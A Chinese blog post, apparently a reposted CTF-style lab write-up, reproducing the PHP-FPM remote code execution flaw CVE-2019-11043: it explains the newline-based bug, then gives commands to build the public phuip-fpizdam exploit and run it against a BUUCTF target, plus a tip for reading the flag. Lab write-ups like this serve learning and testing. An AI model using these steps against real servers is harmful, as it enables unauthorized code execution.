cve漏洞复现php,PHP-FPM 远程代码执行漏洞(CVE-2019-11043)的简单复现学习

1.概述

漏洞主要由于 PHP-FPM 中 sapi/ fpm/ fpm/ fpm_main.c 文件内的 env_path_info 下溢导致,攻击者可以使用换行符 %0a 破坏 Nginx 中 fastcgi_split_path_info 对应的正则表达式,导致传递给 PHP-FPM 的 PATH_INFO 值为空,从而触发该漏洞,通过发送特制的URL请求,在一些特殊的配置情况下会导致任意代码执行

2.复现环境(因为exp需要go语言环境编译,所以老老实实配置go语言环境吧)

1)下载go语言安装包

wget https://studygolang.com/dl/golang/go1.10.3.linux-amd64.tar.gz

6f578309820e5121ddfb8c04d36b61f7.png

2)解压到指定目录/usr/local/下

root@Mke:/usr/local# tar -C /usr/local -xzf go1.10.3.linux-amd64.tar.gz

1030b9f6c9d869d4dd4ec0d604a73c87.png

3)在/etc/profile末尾加一句话

vim /etc/profile

#####这一句,是添加go语言的环境变量,全局调用

export PATH=$PATH:/usr/local/go/bin

4)然后使得配置生效

source /etc/profile

查看一下go语言环境

52c1b4d2162c340770e07352cb3fe680.png

完美

3.下载工具包(exp)

go get github.com/neex/phuip-fpizdam

####下载完成后会在当前目录下生成一个go目录

cd go/src/

####切换到这个目录下,编译go源码

go build github.com/neex/phuip-fpizdam

####编译完成会生成一个phuip-fpizdam文件

adce650a7d80e3e9a190206b236b3f19.png

4.测试漏洞

注:漏洞环境懒得搭,所以用buuctf的漏洞环境作为靶场(嗯,赵师傅NB!!!)

攻击步骤嘛

./phuip-fpizdam 目标地址/index.php

e7be9729acdeae45858529e9e6483a41.png

访问·一下目标地址

dff850a87de6a1f7a1624f25d1102faf.png

查看一下当前权限

60377142db2e0c32bdfd42610ac62088.png

复现基本结束

菜鸡笔记—-2020-1-14

末尾送个彩蛋,参数a=env即可Get Flag   ,/笑

b739ec46bb5c46d9c0aa4ce35ba1ea56.png

关于找一找教程网

本站文章仅代表作者观点,不代表本站立场,所有文章非营利性免费分享。

本站提供了软件编程、网站开发技术、服务器运维、人工智能等等IT技术文章,希望广大程序员努力学习,让我们用科技改变世界。

[PHP-FPM 远程代码执行漏洞(CVE-2019-11043)的简单复现学习]http://www.zyiz.net/tech/detail-99279.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值